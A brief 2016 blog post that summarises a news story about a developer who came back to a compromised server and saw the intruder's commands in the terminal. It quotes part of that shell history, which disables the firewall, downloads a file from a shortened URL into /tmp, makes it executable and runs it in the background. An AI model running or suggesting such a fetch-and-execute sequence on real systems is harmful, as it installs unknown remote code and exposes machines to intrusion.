- Back to Home »
- Developer watches as hackers break into a server
Posted by : Brij Bhushan
Wednesday, 10 February 2016
Usually network infrastructure teams try to piece together how they were hacked, but one developer over on Superuser found themselves the audience to exactly how a major hack on their infrastructure unfolded. User Vaid asked on Superuser if their server was compromised after walking away for an hour break and coming back to hundreds of commands written in the terminal window — it turns out that the server was indeed hacked: 355 service iptables stop 356 cd /tmp 357 wget http://ift.tt/1orkiTD 358 chmod 0755 /tmp/yjz1 359 nohup /tmp/yjz1 > /dev/null 2>&1 & 360 chmod 777 yjz1 361 ./yjz1 362 chmod 0755…
This story continues at The Next Web